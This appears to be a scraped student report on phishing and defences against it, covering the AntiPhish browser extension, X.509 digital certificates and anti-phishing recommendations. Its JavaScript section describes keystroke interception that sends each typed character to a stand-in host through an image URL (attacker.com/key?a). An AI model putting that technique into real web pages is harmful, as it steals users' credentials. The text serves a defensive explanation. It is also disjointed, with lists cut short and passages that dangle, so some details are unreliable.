Escolar Documentos
Profissional Documentos
Cultura Documentos
INTRODUCTION
Phishing is the practice where criminals send out unsolicited
Commercial e-mails, masquerading as valid authorities by using
Logos and other formatting to resemble authentic e-mails sent by
the company that they are attempting to impersonate.
Once the users receive such emails; the phishers attempt to lure
them to web sites where personal information such as credit card
number and social security numbers are required in an attempt to
hack into the users’ accounts. The so-called “phishers” try to steal
usernames and passwords for identity and banking theft.
LITERATURE REVIEW
Comparison to Spam
The purpose of a phishing message is to acquire sensitive
information about a user. In order to do so, the message needs to
deceive the intended recipient into believing it is from a
legitimate organization. As a form of deception, a phishing
message contains no useful information for the intended recipient
and thus falls under the category of spam. Although phishing is
categorized as spam, it also differs from spam. Amongst other
things, spam tries to sell a product or service, while a phishing
message needs to look like it is from a legitimate organization.
Due to the similarity between phishing and legitimate messages,
techniques that are applied to spam messages cannot be applied
naively to phishing messages. For example, text-based
classification can perform reasonably well in identifying spam, but
as a phishing message is forged to look like a message from a
legitimate organization, text-based classification applied naively
to a phishing message will have a high miss rate.
Anatomy of a phishing message
Content:
The content is the part of the message that the user sees and is
used by phishing message producers to deceive users. It can be
subdivided into two parts.
Headers
The headers are the part of the message which is primarily used
by the mail servers and the mail client to determine where the
message is going and how to unpack the message. Most users do
not see these headers, but in terms of determining if a message is
phishing or not, this part of the message can be quite useful.
Headers can be subdivided into three parts based on the entities
which add them to the message:
• Mail relays will add headers along the path of the message.
These are usually “Received” headers, which can be used to
determine the originating IP of the message and the path
taken by the message.
PHISHING?(ANTI-PHISHING)
JavaScr ipt
As long as the web page that the user is viewing is pure HTML,
AntiPhish can easily mitigate phishing attacks. This is because the
attacker can only steal the sensitive information in the page after
the user performs a submit. Before this can
happen, however, AntiPhish detects that sensitive information has
been typed into a form and cancels the operation. Stopping a
phishing attack in an HTML page that has JavaScript, on the other
hand, is not that easy and special care has to be taken. JavaScript
is a powerful language that is widely used in webpage for
providing functionality such as submitting forms, opening
windows, intercepting events and performing input validity
checks. At the same time, however, JavaScript gives the attacker
a wide range of possibilities for by-passing a monitoring
application such as AntiPhish. Just as AntiPhish creates hooks for
intercepting user generated events such as key strokes, the
attacker can also create such hooks using JavaScript embedded
into the HTML page. Instead of waiting for the user to press a
submit button to send the information, the attacker could
intercept the keys that are pressed and send the information
character by character to a server of her choice. Typically, this is
done by modifying the URL of an existing or hidden image to a
web site that the attacker controls (e.g., if “a “has been pressed,
an image URL may be set to http://attacker.com/key?a). Another
possibility for the attacker could be to set a simple timer and to
capture “snapshots” of the information in the forms. In this way,
an important part of the information could be captured without
the user ever hitting a submit button. The easiest solution to the
JavaScript problem is to deactivate JavaScript on a page that
contains forms. Unfortunately, this solution is not feasible
because, as mentioned before, a large number of Web sites use
JavaScript for validation and submission purposes. The solution
we use in AntiPhish is to deactivate JavaScript every time the
focus is on an HTML text element and to reactivate it whenever
the focus is lost. Using this technique, we ensure that the attacker
is not able to create hooks, timers and intercept browser events
such as key presses while the user is typing information into a
text field. At the same time, we ensure that the legitimate
JavaScript functionality on a page (e.g., such as input validation
routines) are preserved. By the time the focus is lost from the text
element and Java script is reactivated, AntiPhish has already
determined if the information that was typed into the text
element is sensitive. If the web site is un trusted, the operation
can be canceled. One side-effect of our approach is that
legitimate event-based Java script functionality such as input
validation based on key presses will not function. The use of key
press events for input validation, however, is uncommon. Most
web sites perform client-side input validation once before a form
is submitted.
Implementation details
We implemented the prototype of AntiPhish as a Mozilla browser
extension (i.e., plug-in).Mozilla browser extensions are written
using the Mozilla XML User-Interface language (XUL) and
JavaScript. The Mozilla implementation of AntiPhish has a small
footprint and consists of about 900 lines of JavaScript code and
200 lines of XUL user interface code. We used Paul Tero’s
JavaScript DES implementation for safely storing the sensitive
information.
Digital Certificates
Digital Certificates are part of a technology called Public Key
Infrastructure or
PKI. Digital certificates have been described as virtual ID cards.
This is a useful analogy. There are many ways that digital
certificates and ID cards really are the
same. Both ID cards and client digital certificates contain
information about user,
such as user name and information about the organization that
issued the
certificate or card to user.
Creating digital certificates a unique cryptographic key pair is
generated. One of these keys is referred to as a public key and
the other as a private key. The certification authority—generally
on your campus—creates a digital certificate by combining
information about user and the issuing organization with the
public key and digitally signing the whole thing. This is very much
like an organization’s ID office filling out an ID card for user and
then signing it to make it official.
The process defines how a certificate authority establishes that a
person or institution is who they say they are. Certification may
require recipients to appear in person and to present pictures,
birth certificates, or social security numbers. Certificates that are
issued after rigorous authentication will be more trustworthy than
certificates requiring little or no authentication.
The contents of a digital certificate are prescribed by the X.509
standard, developed by the International Standards Organization
(ISO) and adopted by the American National Standards Institute
(ANSI) and the Internet Engineering Task Force (IETF). The latest
version is now X509 v3. The principal elements of a digital
certificate are as follows:
• Version number of the certificate format
• Serial number of the certificate
• Signature algorithm identifier
• Issuer of digital certificate: a certificate authority with URL
• Validity period
• Unique identification of certificate holder
• Public key information
The Parties to a Digital Certificate
In principle there are three different interests associated with a digital certificate:
The Requesting Party
The party who needs the certificate and will offer it for use by others they will
generally provide some or all of the information it contains.
The Issuing Party
The party that digitally signs the certificate after creating the information in the
certificate or checking its correctness.
The Verifying Party (or Parties)
Parties that validate the signature on the certificate and then rely on its contents for
some purpose.
Type of Certificate Requesting Party Issuing Party Verifying Party
Identity The person The appropriate Anyone undertaking
concerned government agency an
identity check
Accreditation A qualified member The professional A user of the services
of a profession body offered by the
member
Authorization A customer wishing to The resource owner The resource owner
access a resource
Types of Certificates
There are different types of certificates, each with different functions and this can
be confusing. It helps to differentiate between at least four types of certificates.
You can see samples of some of these different types of certificates in your
browser.
• Root or authority certificates
These are certificates that create the base (or root) of a certification authority
hierarchy, such as Thawte or CREN. These certificates are not signed by another
CA—they are self signed by the CA that created them. When a certificate is self-
signed, it means that the name in the Issuer field is the same as the name in the
Subject Field.
• Institutional authority certificates
These certificates are also called campus certificates. These certificates are signed
by a third party verifying the authenticity of a campus certification authority.
Campuses then use their “authority” to issue client certificates for faculty, staff,
and students.
• Client certificates
These are also known as end-entity certificates, identity certificates, or personal
certificates. The Issuer is typically the campus CA.
• Web server certificates
These certificates are used to secure communications to and from Web servers, for
example when you buy something on the Web. They are called server-side
certificates. The Subject name in a server certificate is the DNS name of the server.
With these three levels of service — including the free test certificates — CREN
can help campuses get started using digital certificates at a level matching their
particular campus needs.
RECOMMENDATION
It is very important to reduce the risk of phishing in today’s
business because hackers need to stay out of companies’
databases. Today’s education is not enough since phishes are
getting better each day and coming with newer trends to catch
innocent customers.
The real problem of phishing is because the login systems are
very weak and thus they need to be tighter when it comes to
user’s authentication. The companies could increase their
cryptographic system protection by using more IPSec VPNs and
digital certificates. The use of IPSec VPNs, customers will need to
establish digital certificates from a certificate authority as well as
the merchant. Recently, while doing this research we came
through an article from PayPal where they are convincing email
providers to block messages that lack digital signatures.
The reason for this is that PayPal is known as one of the most
highly spoofed brands that fraudster’s uses today .This is a very
good idea and a good way to keep hackers out of PayPal
databases. As a matter of fact, not only PayPal but also every
company that conducts business should come up with a similar
strategy like this. Using strategies similar to this will help
customers to gain confidence in doing business and dealing with
money issues. In addition, well-known companies should increase
user awareness by education, training and working with FBI to
track down phishers.
CONCLUSION
In short, the outcomes of phishing attacks are dramatically
increasing every day. Attacks on financial services companies
have been doubling each year compared to previous years. It is of
crucial importance for companies to come up with new ways to
solve phishing problems because it can become a major loss to
well-known companies.
Also, it can cause consumers to lose confidence in doing business
online, which can affect many companies with an online presence.
Not any type of technology
Can stop phishing attacks, but there are many ways to enable
Phishes from accomplishing their goals.
Consumer education can increase the awareness of the phishing
threat and other online vulnerabilities. Lastly, biometrics should
become one of the major aspects and play an important role to
combat phishing because it provides different steps to
authenticate users.
REFERENCES
[1] Cannon, J.C. Privacy. Pearson Education, 2005.
[2] Hilley, Sarah. “Internet war: picking on the finance
Sector-survey.” Computer Fraud & Security, October
2006.
[3] Bellowin, Steven. “Spamming, Phishing,
Authentication and Privacy.” Inside Risks, December
2004 Vol.47, No.12. 144.
[4] Mulrean, Jennifer. “Phishing scams: How to avoid
Getting hooked.” DollarWise.
[5] Hunter, Philip. “Microsoft declares war on phishers.”
Computer Fraud & Security May 2006: (15-16).
[6] Google. http://www.google.com